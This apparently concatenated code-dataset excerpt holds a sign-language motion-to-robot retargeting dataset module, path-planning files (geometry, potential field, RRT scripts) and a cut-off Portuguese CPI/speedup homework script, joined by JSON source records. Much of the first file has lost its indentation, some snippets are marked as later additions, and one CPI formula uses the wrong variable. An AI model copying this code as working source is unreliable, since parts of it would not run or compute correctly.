l_shoulder_pos, l_elbow_pos, l_wrist_pos, r_shoulder_pos, r_elbow_pos, r_wrist_pos,
l_shoulder_quat, l_elbow_quat, l_wrist_quat, r_shoulder_quat, r_elbow_quat, r_wrist_quat):
# x
x = torch.stack([torch.from_numpy(l_shoulder_euler),
torch.from_numpy(l_elbow_euler),
torch.from_numpy(l_wrist_euler),
torch.from_numpy(r_shoulder_euler),
torch.from_numpy(r_elbow_euler),
torch.from_numpy(r_wrist_euler)], dim=0).float()
# number of nodes
num_nodes = 6
# edge index
edge_index = torch.LongTensor([[0, 1, 3, 4],
[1, 2, 4, 5]])
# position
pos = torch.stack([torch.from_numpy(l_shoulder_pos),
torch.from_numpy(l_elbow_pos),
torch.from_numpy(l_wrist_pos),
torch.from_numpy(r_shoulder_pos),
torch.from_numpy(r_elbow_pos),
torch.from_numpy(r_wrist_pos)], dim=0).float()
# edge attributes
edge_attr = []
for edge in edge_index.permute(1, 0):
parent = edge[0]
child = edge[1]
edge_attr.append(pos[child] - pos[parent])
edge_attr = torch.stack(edge_attr, dim=0)
# skeleton type & topology type
skeleton_type = 0
topology_type = 0
# end effector mask
ee_mask = torch.zeros(num_nodes, 1).bool()
ee_mask[2] = ee_mask[5] = True
# shoulder mask
sh_mask = torch.zeros(num_nodes, 1).bool()
sh_mask[0] = sh_mask[3] = True
# elbow mask
el_mask = torch.zeros(num_nodes, 1).bool()
el_mask[1] = el_mask[4] = True
# parent
parent = torch.LongTensor([-1, 0, 1, -1, 3, 4])
# offset
offset = torch.zeros(num_nodes, 3)
for node_idx in range(num_nodes):
if parent[node_idx] != -1:
offset[node_idx] = pos[node_idx] - pos[parent[node_idx]]
else:
offset[node_idx] = pos[node_idx]
# distance to root
root_dist = torch.zeros(num_nodes, 1)
for node_idx in range(num_nodes):
dist = 0
current_idx = node_idx
while current_idx != -1:
origin = offset[current_idx]
offsets_mod = math.sqrt(origin[0]**2+origin[1]**2+origin[2]**2)
dist += offsets_mod
current_idx = parent[current_idx]
root_dist[node_idx] = dist
# distance to shoulder
shoulder_dist = torch.zeros(num_nodes, 1)
for node_idx in range(num_nodes):
dist = 0
current_idx = node_idx
while current_idx != -1 and current_idx != 0 and current_idx != 3:
origin = offset[current_idx]
offsets_mod = math.sqrt(origin[0]**2+origin[1]**2+origin[2]**2)
dist += offsets_mod
current_idx = parent[current_idx]
shoulder_dist[node_idx] = dist
# distance to elbow
elbow_dist = torch.zeros(num_nodes, 1)
for node_idx in range(num_nodes):
dist = 0
current_idx = node_idx
while current_idx != -1 and current_idx != 1 and current_idx != 4:
origin = offset[current_idx]
offsets_mod = math.sqrt(origin[0]**2+origin[1]**2+origin[2]**2)
dist += offsets_mod
current_idx = parent[current_idx]
elbow_dist[node_idx] = dist
# quaternion
q = torch.stack([torch.from_numpy(l_shoulder_quat.as_quat()),
torch.from_numpy(l_elbow_quat.as_quat()),
torch.from_numpy(l_wrist_quat.as_quat()),
torch.from_numpy(r_shoulder_quat.as_quat()),
torch.from_numpy(r_elbow_quat.as_quat()),
torch.from_numpy(r_wrist_quat.as_quat())], dim=0).float()
data = Data(x=torch.cat([x,pos], dim=-1),
edge_index=edge_index,
edge_attr=edge_attr,
pos=pos,
q=q,
skeleton_type=skeleton_type,
topology_type=topology_type,
ee_mask=ee_mask,
sh_mask=sh_mask,
el_mask=el_mask,
root_dist=root_dist,
shoulder_dist=shoulder_dist,
elbow_dist=elbow_dist,
num_nodes=num_nodes,
parent=parent,
offset=offset)
# print(data)
return data
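# --- Illustrative example (added for clarity, not part of the original file) ---
# Shows, on a tiny 3-joint chain, how the offset / root_dist bookkeeping used in
# parse_arm works: offsets are bone vectors (child position minus parent position,
# or the absolute position for a root), and root_dist accumulates their lengths up
# the kinematic chain. The positions are made up for demonstration.
def _example_offset_and_root_dist():
    pos = torch.tensor([[0.0, 0.0, 0.0],   # root joint
                        [1.0, 0.0, 0.0],   # child of root
                        [1.0, 2.0, 0.0]])  # child of the previous joint
    parent = torch.LongTensor([-1, 0, 1])
    num_nodes = 3
    offset = torch.zeros(num_nodes, 3)
    for node_idx in range(num_nodes):
        if parent[node_idx] != -1:
            offset[node_idx] = pos[node_idx] - pos[parent[node_idx]]
        else:
            offset[node_idx] = pos[node_idx]
    root_dist = torch.zeros(num_nodes, 1)
    for node_idx in range(num_nodes):
        dist = 0
        current_idx = node_idx
        while current_idx != -1:
            dist += offset[current_idx].norm()
            current_idx = parent[current_idx]
        root_dist[node_idx] = dist
    print(root_dist)  # tensor([[0.], [1.], [3.]])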
"""
Source Dataset for Sign Language
"""
class SignDataset(InMemoryDataset):
def __init__(self, root, transform=None, pre_transform=None):
super(SignDataset, self).__init__(root, transform, pre_transform)
self.data, self.slices = torch.load(self.processed_paths[0])
@property
def raw_file_names(self):
data_path = os.path.join(self.root, 'h5')
self._raw_file_names = [os.path.join(data_path, file) for file in os.listdir(data_path)]
return self._raw_file_names
@property
def processed_file_names(self):
return ['data.pt']
def process(self):
data_list = []
for file in self.raw_file_names:
data, _, _ = parse_h5(file)
data_list.extend(data)
if self.pre_filter is not None:
data_list = [data for data in data_list if self.pre_filter(data)]
if self.pre_transform is not None:
data_list = [self.pre_transform(data) for data in data_list]
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
"""
parse h5 with hand
"""
def parse_h5_hand(filename, selected_key=None):
data_list = []
h5_file = h5py.File(filename, 'r')
if selected_key is None:
keys = h5_file.keys()
else:
keys = [selected_key]
for key in keys:
if '语句' in key and selected_key is None:
            print('Skipping ' + key)
continue
# glove data
l_glove_pos = h5_file[key + '/l_glove_pos'][:]
r_glove_pos = h5_file[key + '/r_glove_pos'][:]
# insert zero for root
total_frames = l_glove_pos.shape[0]
l_glove_pos = np.concatenate([np.zeros((total_frames, 1, 3)), l_glove_pos], axis=1)
r_glove_pos = np.concatenate([np.zeros((total_frames, 1, 3)), r_glove_pos], axis=1)
# print(l_glove_pos.shape, r_glove_pos.shape)
# switch dimensions
l_glove_pos = np.stack([-l_glove_pos[..., 2], -l_glove_pos[..., 1], -l_glove_pos[..., 0]], axis=-1)
r_glove_pos = np.stack([-r_glove_pos[..., 2], -r_glove_pos[..., 1], -r_glove_pos[..., 0]], axis=-1)
for t in range(total_frames):
data = parse_glove_pos(l_glove_pos[t])
data.l_hand_x = data.x
data.l_hand_edge_index = data.edge_index
data.l_hand_edge_attr = data.edge_attr
data.l_hand_pos = data.pos
data.l_hand_ee_mask = data.ee_mask
data.l_hand_el_mask = data.el_mask
data.l_hand_root_dist = data.root_dist
data.l_hand_elbow_dist = data.elbow_dist
data.l_hand_num_nodes = data.num_nodes
data.l_hand_parent = data.parent
data.l_hand_offset = data.offset
r_hand_data = parse_glove_pos(r_glove_pos[t])
data.r_hand_x = r_hand_data.x
data.r_hand_edge_index = r_hand_data.edge_index
data.r_hand_edge_attr = r_hand_data.edge_attr
data.r_hand_pos = r_hand_data.pos
data.r_hand_ee_mask = r_hand_data.ee_mask
data.r_hand_el_mask = r_hand_data.el_mask
data.r_hand_root_dist = r_hand_data.root_dist
data.r_hand_elbow_dist = r_hand_data.elbow_dist
data.r_hand_num_nodes = r_hand_data.num_nodes
data.r_hand_parent = r_hand_data.parent
data.r_hand_offset = r_hand_data.offset
data_list.append(data)
return data_list
def parse_glove_pos(glove_pos):
# x
x = torch.from_numpy(glove_pos).float()
# number of nodes
num_nodes = 17
# edge index
edge_index = torch.LongTensor([[0, 1, 2, 0, 4, 5, 0, 7, 8, 0, 10, 11, 0, 13, 14, 15],
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]])
# position
pos = torch.from_numpy(glove_pos).float()
# edge attributes
edge_attr = []
for edge in edge_index.permute(1, 0):
parent = edge[0]
child = edge[1]
edge_attr.append(pos[child] - pos[parent])
edge_attr = torch.stack(edge_attr, dim=0)
# skeleton type & topology type
skeleton_type = 0
topology_type = 0
# end effector mask
ee_mask = torch.zeros(num_nodes, 1).bool()
ee_mask[3] = ee_mask[6] = ee_mask[9] = ee_mask[12] = ee_mask[16] = True
# elbow mask
el_mask = torch.zeros(num_nodes, 1).bool()
el_mask[1] = el_mask[4] = el_mask[7] = el_mask[10] = el_mask[13] = True
# parent
parent = torch.LongTensor([-1, 0, 1, 2, 0, 4, 5, 0, 7, 8, 0, 10, 11, 0, 13, 14, 15])
# offset
offset = torch.zeros(num_nodes, 3)
for node_idx in range(num_nodes):
if parent[node_idx] != -1:
offset[node_idx] = pos[node_idx] - pos[parent[node_idx]]
# distance to root
root_dist = torch.zeros(num_nodes, 1)
for node_idx in range(num_nodes):
dist = 0
current_idx = node_idx
while parent[current_idx] != -1:
origin = offset[current_idx]
offsets_mod = math.sqrt(origin[0]**2+origin[1]**2+origin[2]**2)
dist += offsets_mod
current_idx = parent[current_idx]
root_dist[node_idx] = dist
# distance to elbow
elbow_dist = torch.zeros(num_nodes, 1)
for node_idx in range(num_nodes):
dist = 0
current_idx = node_idx
while current_idx != -1 and not el_mask[current_idx]:
origin = offset[current_idx]
offsets_mod = math.sqrt(origin[0]**2+origin[1]**2+origin[2]**2)
dist += offsets_mod
current_idx = parent[current_idx]
elbow_dist[node_idx] = dist
data = Data(x=x,
edge_index=edge_index,
edge_attr=edge_attr,
pos=pos,
skeleton_type=skeleton_type,
topology_type=topology_type,
ee_mask=ee_mask,
el_mask=el_mask,
root_dist=root_dist,
elbow_dist=elbow_dist,
num_nodes=num_nodes,
parent=parent,
offset=offset)
# print(data)
return data
"""
Source Dataset for Sign Language with Hand
"""
class SignWithHand(InMemoryDataset):
def __init__(self, root, transform=None, pre_transform=None):
super(SignWithHand, self).__init__(root, transform, pre_transform)
self.data, self.slices = torch.load(self.processed_paths[0])
@property
def raw_file_names(self):
data_path = os.path.join(self.root, 'h5')
self._raw_file_names = [os.path.join(data_path, file) for file in os.listdir(data_path)]
return self._raw_file_names
@property
def processed_file_names(self):
return ['data.pt']
def process(self):
data_list = []
for file in self.raw_file_names:
data = parse_h5_hand(file)
data_list.extend(data)
if self.pre_filter is not None:
data_list = [data for data in data_list if self.pre_filter(data)]
if self.pre_transform is not None:
data_list = [self.pre_transform(data) for data in data_list]
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
"""
Target Dataset for Inspire Hand
"""
class InspireHand(InMemoryDataset):
hand_cfg = {
'joints_name': [
'yumi_link_7_r_joint',
'Link1',
'Link11',
'Link1111',
'Link2',
'Link22',
'Link2222',
'Link3',
'Link33',
'Link3333',
'Link4',
'Link44',
'Link4444',
'Link5',
'Link51',
'Link52',
'Link53',
'Link5555',
],
'edges': [
['yumi_link_7_r_joint', 'Link1'],
['Link1', 'Link11'],
['Link11', 'Link1111'],
['yumi_link_7_r_joint', 'Link2'],
['Link2', 'Link22'],
['Link22', 'Link2222'],
['yumi_link_7_r_joint', 'Link3'],
['Link3', 'Link33'],
['Link33', 'Link3333'],
['yumi_link_7_r_joint', 'Link4'],
['Link4', 'Link44'],
['Link44', 'Link4444'],
['yumi_link_7_r_joint', 'Link5'],
['Link5', 'Link51'],
['Link51', 'Link52'],
['Link52', 'Link53'],
['Link53', 'Link5555'],
],
'root_name': 'yumi_link_7_r_joint',
'end_effectors': [
'Link1111',
'Link2222',
'Link3333',
'Link4444',
'Link5555',
],
'elbows': [
'Link1',
'Link2',
'Link3',
'Link4',
'Link5',
],
}
def __init__(self, root, transform=None, pre_transform=None):
super(InspireHand, self).__init__(root, transform, pre_transform)
self.data, self.slices = torch.load(self.processed_paths[0])
@property
def raw_file_names(self):
self._raw_file_names = [os.path.join(self.root, file) for file in os.listdir(self.root) if file.endswith('.urdf')]
return self._raw_file_names
@property
def processed_file_names(self):
return ['data.pt']
def process(self):
data_list = []
for file in self.raw_file_names:
data_list.append(hand2graph(file, self.hand_cfg))
if self.pre_filter is not None:
data_list = [data for data in data_list if self.pre_filter(data)]
if self.pre_transform is not None:
data_list = [self.pre_transform(data) for data in data_list]
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
"""
parse h5 with all data
"""
def parse_all(filename, selected_key=None):
data_list = []
h5_file = h5py.File(filename, 'r')
if selected_key is None:
keys = h5_file.keys()
else:
keys = [selected_key]
for key in keys:
if '语句' in key and selected_key is None:
            print('Skipping ' + key)
continue
# position data
l_shoulder_pos = h5_file[key + '/l_up_pos'][:]
r_shoulder_pos = h5_file[key + '/r_up_pos'][:]
l_elbow_pos = h5_file[key + '/l_fr_pos'][:]
r_elbow_pos = h5_file[key + '/r_fr_pos'][:]
l_wrist_pos = h5_file[key + '/l_hd_pos'][:]
r_wrist_pos = h5_file[key + '/r_hd_pos'][:]
# quaternion data
l_shoulder_quat = R.from_quat(h5_file[key + '/l_up_quat'][:])
r_shoulder_quat = R.from_quat(h5_file[key + '/r_up_quat'][:])
l_elbow_quat = R.from_quat(h5_file[key + '/l_fr_quat'][:])
r_elbow_quat = R.from_quat(h5_file[key + '/r_fr_quat'][:])
l_wrist_quat = R.from_quat(h5_file[key + '/l_hd_quat'][:])
r_wrist_quat = R.from_quat(h5_file[key + '/r_hd_quat'][:])
# rotation matrix data
l_shoulder_matrix = l_shoulder_quat.as_matrix()
r_shoulder_matrix = r_shoulder_quat.as_matrix()
l_elbow_matrix = l_elbow_quat.as_matrix()
r_elbow_matrix = r_elbow_quat.as_matrix()
l_wrist_matrix = l_wrist_quat.as_matrix()
r_wrist_matrix = r_wrist_quat.as_matrix()
# transform to local coordinates
# l_wrist_matrix = l_wrist_matrix * inv(l_elbow_matrix)
# r_wrist_matrix = r_wrist_matrix * inv(r_elbow_matrix)
# l_elbow_matrix = l_elbow_matrix * inv(l_shoulder_matrix)
# r_elbow_matrix = r_elbow_matrix * inv(r_shoulder_matrix)
# l_shoulder_matrix = l_shoulder_matrix * inv(l_shoulder_matrix)
# r_shoulder_matrix = r_shoulder_matrix * inv(r_shoulder_matrix)
# euler data
l_shoulder_euler = R.from_matrix(l_shoulder_matrix).as_euler('zyx', degrees=True)
r_shoulder_euler = R.from_matrix(r_shoulder_matrix).as_euler('zyx', degrees=True)
l_elbow_euler = R.from_matrix(l_elbow_matrix).as_euler('zyx', degrees=True)
r_elbow_euler = R.from_matrix(r_elbow_matrix).as_euler('zyx', degrees=True)
l_wrist_euler = R.from_matrix(l_wrist_matrix).as_euler('zyx', degrees=True)
r_wrist_euler = R.from_matrix(r_wrist_matrix).as_euler('zyx', degrees=True)
# glove data
l_glove_pos = h5_file[key + '/l_glove_pos'][:]
r_glove_pos = h5_file[key + '/r_glove_pos'][:]
# insert zero for root
total_frames = l_glove_pos.shape[0]
l_glove_pos = np.concatenate([np.zeros((total_frames, 1, 3)), l_glove_pos], axis=1)
r_glove_pos = np.concatenate([np.zeros((total_frames, 1, 3)), r_glove_pos], axis=1)
# print(l_glove_pos.shape, r_glove_pos.shape)
# switch dimensions
l_glove_pos = np.stack([-l_glove_pos[..., 2], -l_glove_pos[..., 1], -l_glove_pos[..., 0]], axis=-1)
r_glove_pos = np.stack([-r_glove_pos[..., 2], -r_glove_pos[..., 1], -r_glove_pos[..., 0]], axis=-1)
for t in range(total_frames):
data = Data()
l_hand_data = parse_glove_pos(l_glove_pos[t])
data.l_hand_x = l_hand_data.x
data.l_hand_edge_index = l_hand_data.edge_index
data.l_hand_edge_attr = l_hand_data.edge_attr
data.l_hand_pos = l_hand_data.pos
data.l_hand_ee_mask = l_hand_data.ee_mask
data.l_hand_el_mask = l_hand_data.el_mask
data.l_hand_root_dist = l_hand_data.root_dist
data.l_hand_elbow_dist = l_hand_data.elbow_dist
data.l_hand_num_nodes = l_hand_data.num_nodes
data.l_hand_parent = l_hand_data.parent
data.l_hand_offset = l_hand_data.offset
r_hand_data = parse_glove_pos(r_glove_pos[t])
data.r_hand_x = r_hand_data.x
data.r_hand_edge_index = r_hand_data.edge_index
data.r_hand_edge_attr = r_hand_data.edge_attr
data.r_hand_pos = r_hand_data.pos
data.r_hand_ee_mask = r_hand_data.ee_mask
data.r_hand_el_mask = r_hand_data.el_mask
data.r_hand_root_dist = r_hand_data.root_dist
data.r_hand_elbow_dist = r_hand_data.elbow_dist
data.r_hand_num_nodes = r_hand_data.num_nodes
data.r_hand_parent = r_hand_data.parent
data.r_hand_offset = r_hand_data.offset
arm_data = parse_arm(l_shoulder_euler[t], l_elbow_euler[t], l_wrist_euler[t], r_shoulder_euler[t], r_elbow_euler[t], r_wrist_euler[t],
l_shoulder_pos[t], l_elbow_pos[t], l_wrist_pos[t], r_shoulder_pos[t], r_elbow_pos[t], r_wrist_pos[t],
l_shoulder_quat[t], l_elbow_quat[t], l_wrist_quat[t], r_shoulder_quat[t], r_elbow_quat[t], r_wrist_quat[t])
data.x = arm_data.x
data.edge_index = arm_data.edge_index
data.edge_attr = arm_data.edge_attr
data.pos = arm_data.pos
data.q = arm_data.q
data.skeleton_type = arm_data.skeleton_type
data.topology_type = arm_data.topology_type
data.ee_mask = arm_data.ee_mask
data.sh_mask = arm_data.sh_mask
data.el_mask = arm_data.el_mask
data.root_dist = arm_data.root_dist
data.shoulder_dist = arm_data.shoulder_dist
data.elbow_dist = arm_data.elbow_dist
data.num_nodes = arm_data.num_nodes
data.parent = arm_data.parent
data.offset = arm_data.offset
data_list.append(data)
return data_list
"""
Source Dataset for Sign Language with Hand
"""
class SignAll(InMemoryDataset):
def __init__(self, root, transform=None, pre_transform=None):
super(SignAll, self).__init__(root, transform, pre_transform)
self.data, self.slices = torch.load(self.processed_paths[0])
@property
def raw_file_names(self):
data_path = os.path.join(self.root, 'h5')
self._raw_file_names = [os.path.join(data_path, file) for file in os.listdir(data_path)]
return self._raw_file_names
@property
def processed_file_names(self):
return ['data.pt']
def process(self):
data_list = []
for file in self.raw_file_names:
data = parse_all(file)
data_list.extend(data)
if self.pre_filter is not None:
data_list = [data for data in data_list if self.pre_filter(data)]
if self.pre_transform is not None:
data_list = [self.pre_transform(data) for data in data_list]
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
"""
Target Dataset for Yumi
"""
class YumiAll(InMemoryDataset):
def __init__(self, root, transform=None, pre_transform=None):
super(YumiAll, self).__init__(root, transform, pre_transform)
self.data, self.slices = torch.load(self.processed_paths[0])
@property
def raw_file_names(self):
self._raw_file_names = [os.path.join(self.root, file) for file in os.listdir(self.root) if file.endswith('.urdf')]
return self._raw_file_names
@property
def processed_file_names(self):
return ['data.pt']
def process(self):
data_list = []
for file in self.raw_file_names:
data = yumi2graph(file, YumiDataset.yumi_cfg)
hand_data = hand2graph(file, InspireHand.hand_cfg)
data.hand_x = hand_data.x
data.hand_edge_index = hand_data.edge_index
data.hand_edge_attr = hand_data.edge_attr
data.hand_ee_mask = hand_data.ee_mask
data.hand_el_mask = hand_data.el_mask
data.hand_root_dist = hand_data.root_dist
data.hand_elbow_dist = hand_data.elbow_dist
data.hand_num_nodes = hand_data.num_nodes
data.hand_parent = hand_data.parent
data.hand_offset = hand_data.offset
data.hand_axis = hand_data.axis
data.hand_lower = hand_data.lower
data.hand_upper = hand_data.upper
data_list.append(data)
if self.pre_filter is not None:
data_list = [data for data in data_list if self.pre_filter(data)]
if self.pre_transform is not None:
data_list = [self.pre_transform(data) for data in data_list]
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
if __name__ == '__main__':
yumi_dataset = YumiDataset(root='./data/target/yumi')
sign_dataset = SignDataset(root='./data/source/sign/train', pre_transform=transforms.Compose([Normalize()]))
inspire_hand = InspireHand(root='./data/target/yumi-with-hands')
sign_with_hand = SignWithHand(root='./data/source/sign-hand/train', pre_transform=transforms.Compose([Normalize()]))
sign_all = SignAll(root='./data/source/sign-all/train', pre_transform=transforms.Compose([Normalize()]))
yumi_all = YumiAll(root='./data/target/yumi-all')
``` |
{
"source": "0aqz0/Robotics-Notebook",
"score": 2
} |
#### File: PathPlanning/DynamicWindowApproach/DynamicWindowApproach.py
```python
from PathPlanning.utils import *
class DWAPlanner(PathPlanner):
def __init__(self):
PathPlanner.__init__(self)
def plan(self, start, target):
pass
```
#### File: Robotics-Notebook/PathPlanning/geometry.py
```python
import math
class Point(object):
def __init__(self, x, y):
self.x = x
self.y = y
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def __add__(self, other):
return Point(self.x + other.x, self.y + other.y)
def dist(self, other):
return math.sqrt(pow(self.x - other.x, 2) + pow(self.y - other.y, 2))
def dir(self, other):
return math.atan2(other.y - self.y, other.x - self.x)
def tuple(self):
return self.x, self.y
class Vector(object):
def __init__(self, x, y):
self.x = x
self.y = y
def dir(self):
return math.atan2(self.y, self.x)
def mod(self):
return math.sqrt(pow(self.x, 2) + pow(self.y, 2))
def __mul__(self, other):
return Vector(other*self.x, other*self.y)
def __add__(self, other):
return Vector(self.x+other.x, self.y+other.y)
def Polar2Vector(dist, theta):
return Vector(dist*math.cos(theta), dist*math.sin(theta))
```
#### File: PathPlanning/PotentialField/PotentialField.py
```python
from PathPlanning.utils import *
class PotentialFieldPlanner(PathPlanner):
def __init__(self, map, iterations=1e4, step_size=2, ka=1, kr=1e4, da=10, dr=100):
PathPlanner.__init__(self)
self.map = map
self.iterations = iterations
self.step_size = step_size
self.motions = [
Vector(1, 0), # right
Vector(0, 1), # up
Vector(-1, 0), # left
Vector(0, -1), # down
Vector(-1, -1), # left and down
Vector(-1, 1), # left and up
Vector(1, -1), # right and down
Vector(1, 1), # right and up
]
self.ka = ka
self.kr = kr
self.da = da
self.dr = dr
def plan(self, start, target):
self.finalPath = []
self.finalPath.append(start)
for iteration in range(int(self.iterations)):
currentPos = self.finalPath[-1]
if currentPos.dist(target) < self.step_size:
print('final')
break
lowestPotential = float('inf')
nextPos = currentPos
for motion in self.motions:
newPos = currentPos + motion * self.step_size
newPotential = self.calculate_attractive_potential(newPos, target) + self.calculate_repulsive_potential(newPos)
if newPotential < lowestPotential:
lowestPotential = newPotential
nextPos = newPos
self.finalPath.append(nextPos)
def calculate_attractive_potential(self, pos, target):
if pos.dist(target) <= self.da:
return self.ka * pos.dist(target) ** 2
else:
return self.ka * (2 * self.da * pos.dist(target) - self.da ** 2)
def calculate_repulsive_potential(self, pos):
pr = 0
for obs in self.map.obstacles:
if obs.dist(pos) == 0:
return float('inf')
if obs.dist(pos) <= self.dr:
pr = pr + 0.5 * self.kr * (1/obs.dist(pos) - 1/self.dr) ** 2
return pr
def calculate_potential_force(self, pos, target):
# attractive force(simple version)
attractive_force = Vector(pos.x - target.x, pos.y - target.y) * (-self.ka)
# repulsive force
repulsive_force = Vector(0, 0)
for obs in self.map.obstacles:
if obs.dist(pos) == 0:
repulsive_force += Vector(float('inf'), float('inf'))
elif obs.dist(pos) <= self.dr:
repulsive_force += Vector(pos.x - obs.pos.x, pos.y - obs.pos.y) * self.kr * (1/obs.dist(pos) - 1/self.dr) * ((1/obs.dist(pos))**2) * (1/obs.dist(pos))
# sum up
potential_force = attractive_force + repulsive_force
return potential_force
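# --- Illustrative usage sketch (added for clarity, not part of the original file) ---
# Mirrors the run.py scripts of the other planners in this repo (see the RRT and
# RRTStarSmart examples) and assumes the same Map / obstacle / Point API from
# PathPlanning.utils. It plans with the potential-field method above and draws the
# resulting path.
def _example_potential_field_run():
    map = Map(top=480, down=0, left=0, right=640)
    map.add_obstacle(CircleObstacle(pos=Point(300, 300), radius=50))
    planner = PotentialFieldPlanner(map, step_size=2)
    start, end = Point(0, 0), Point(640, 480)
    while map.is_open:
        planner.plan(start=start, target=end)
        map.add_geometry(type='point', pos=start.tuple(), size=20, color=(100, 0, 0))
        map.add_geometry(type='point', pos=end.tuple(), size=20, color=(0, 100, 0))
        for i in range(len(planner.finalPath) - 1):
            map.add_geometry(type='line', start=planner.finalPath[i].tuple(),
                             end=planner.finalPath[i + 1].tuple(), color=(0, 100, 0))
        map.render()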
```
#### File: PathPlanning/RRT/run.py
```python
from PathPlanning.RRT import RRTPlanner
from PathPlanning.utils import *
def main():
map = Map(top=480, down=0, left=0, right=640)
map.add_obstacle(CircleObstacle(pos=Point(300, 300), radius=50))
map.add_obstacle(RectangleObstacle(top=300, down=100, left=500, right=550))
start = Point(0, 0)
end = Point(640, 480)
rrtPlanner = RRTPlanner(map, epsilon=0.05, stepSize=10)
while map.is_open:
rrtPlanner.plan(start=start, target=end)
map.add_geometry(type='point', pos=start.tuple(), size=30, color=(100, 0, 0))
map.add_geometry(type='point', pos=end.tuple(), size=30, color=(0, 100, 0))
for node in rrtPlanner.nodeList:
map.add_geometry(type='point', pos=node.pos.tuple())
if node.parent is not None:
map.add_geometry(type='line', start=node.parent.pos.tuple(), end=node.pos.tuple())
for i in range(len(rrtPlanner.finalPath)-1):
map.add_geometry(type='line', start=rrtPlanner.finalPath[i].tuple(), end=rrtPlanner.finalPath[i+1].tuple(), color=(0, 100, 0))
map.render()
if __name__ == '__main__':
main()
```
#### File: PathPlanning/RRTStarSmart/run.py
```python
from PathPlanning.RRTStarSmart import RRTStarSmartPlanner
from PathPlanning.utils import *
def main():
map = Map(left=0, right=640, top=480, down=0)
map.add_obstacle(RectangleObstacle(left=450, right=550, top=220, down=200))
map.add_obstacle(RectangleObstacle(left=100, right=400, top=300, down=250))
map.add_obstacle(RectangleObstacle(left=400, right=450, top=400, down=50))
rrtStarSmartPlanner = RRTStarSmartPlanner(map=map, iterations=1e3, epsilon=0.3, step_size=10)
start = Point(550, 350)
end = Point(200, 150)
while map.is_open:
rrtStarSmartPlanner.plan(start=start, target=end)
map.add_geometry(type='point', pos=start.tuple(), size=20, color=(100, 0, 0))
map.add_geometry(type='point', pos=end.tuple(), size=20, color=(0, 100, 0))
for i in range(len(rrtStarSmartPlanner.finalPath)-1):
map.add_geometry(type='line', start=rrtStarSmartPlanner.finalPath[i].tuple(), end=rrtStarSmartPlanner.finalPath[i+1].tuple(), color=(0, 100, 0))
map.render()
if __name__ == '__main__':
main()
``` |
{
"source": "0Augusto/ArquiteturadeComputadores2",
"score": 4
} |
#### File: ArquiteturadeComputadores2/Lista_1/ExercicioTrinta.py
```python
print("Programa em python para calcular o exercicio 30 da lista.")
print("<NAME>")
print("675263")
print("Arquitetura de Computador II")
print("Professor: <NAME>")
print()#pular uma linha
#Funcoes do programa
def menu_func():
print("""Exercicio 30
Opções:
(1) = Qual o CPI médio da máquina?
(2) = Suponha um Overclock de 12/100. Qual o speedUp sobre a máquina original?
(3) = Suponha uma alteração no Hardware e no acesso à memória. Essa alteração reduz em dois ciclos as instruções da ALU ao custo de aumentar em 1 ciclo os acessos à memória. Qual o speedup sobre a máquina original?
(4) = Considere um novo compilador que reduza em 50% as instruções da ALU. Qual o speedup sobre a máquina original?
(5) = Qual o speedup sobre a máq. original se aplicarmos todas as alterações.
(6) = Qual o tempo de execução de cada benchmark e para cada alteração acima para um código com 10000 instruções.
(0) = Encerra o programa.
""")
menu_func()
print()
escolha = input("Make a wise choice! Escolha o exercicio: ")
#Condicoes das funcoes
if escolha == "0":
print("Programa encerrado com sucesso! ")
exit()
#==========================letra a========================================
elif escolha == "1":
A = float(input("Insira a porcentagem das instrucoes da ALU: "))
B = float(input("Insira a porcentagem das instrucoes de desvio: "))
C = float(input("Insira a porcentagem das instrucoes de acesso a memoria: "))
D = float(input("Insira a porcentagem dos outros: "))
E = int(input("ALU")) #instrucoes da ALU
F = int(input("Desvio")) #instrucoes de desvio
G = int(input("Acesso memoria")) #instrucoes de acesso a memoria
H = int(input("Outras")) #outras
CPIMedio = (A * E) + (B * F) + (C * G) + (D * G)
print("O CPI medio eh: %0.4f" %CPIMedio)
#==========================letra b========================================
elif escolha == "2":
print("Inserir os número sem a notacao cientifica, dessa forma -> 1 MHZ = 1000000")
#CPUTimeOriginal = float(input("Insira o CPU original da maquina: "))
#CPUTimeMelhoria = float(input("Insira o valor melhorado do CPUTIME: "))
#speedUp = CPUTimeOriginal/CPUTtimeMelhoria
#ICoriginal = float(input("Insira a instrucao original(IC):" ))
#CPIorigina = float(input("Insira o CPI original: "))
f = float(input("Insira a frequencia original(f): "))
#ICb = float(input("Insira a instrucao de b(ICb): "))
#CPIb = float(input("Insira o CPI de b: "))
fb = float(input("Insira a frequencia de b: "))
speedUp = (f ** -1) * (1.12 * fb)
print("O valor do speedup eh: %0.4f" %speedUp)
#==========================letra c========================================
elif escolha == "3":
A = float(input("Insira a porcentagem da ULA: "))
B = float(input("Insira a porcentagem das instrucoes de desvio: "))
C = float(input("Insira a porcentagem das instrucoes de acesso: "))
D = float(input("Insira a porcentagem das outras: "))
CPIMedioc = (A * 2) + (B * 3) + (C * 6) + (D * 6)
print("O CPI medio eh: %0.4f" %CPIMedioc)
CPIOriginal = float(input("Insira o CPI original (letr a): "))
speedUpc = CPIOriginal/CPIMedioc
print("O speedup de c eh: %0.4f" %speedUpc)
#==========================letra d========================================
elif escolha == "4":
A = int(input("Insira a nova procentagem(metade) da ALU: "))
B = int(input("Insira a porcentagem (inicial) da instrucao de desvio: "))
C = int(input("Insira a porcentagem das instrucoes de acesso: "))
D = int(input("Insira a porcentagem das outras: "))
qtd = int(input("Insira a nova quantidade de instrucoes: "))
CPIMediod = ((A * 4) + (B * 3) + (C * 5) + (D * 6))/qtd
print("CPIMediod = %0.4f" %CPIMediod)
ICori = float(input("Insira a qtd de instrucoes original: "))
CPIori = float(input("Insira o CPI original: "))
ICd = float(input("Insira a qtd de instrucoes nova: "))
CPId = float(input("Insira o CPI nova: "))
speedUp = (ICori * CPIori)/(ICd * CPId)
print("O speedup eh: %0.4f" %speedUp)
#==========================letra e========================================
elif escolha == "5":
A = float(input("Insira a metade da procentagem da ALU: "))
B = float(input("Insira a % das instrucoes de desvio: "))
C = float(input("Insira a % das instrucoes de acesso: "))
D = float(input("Insira a % das outras: "))
qtd = int(input("Insiraa a nova quantidade de instrucoes total: "))
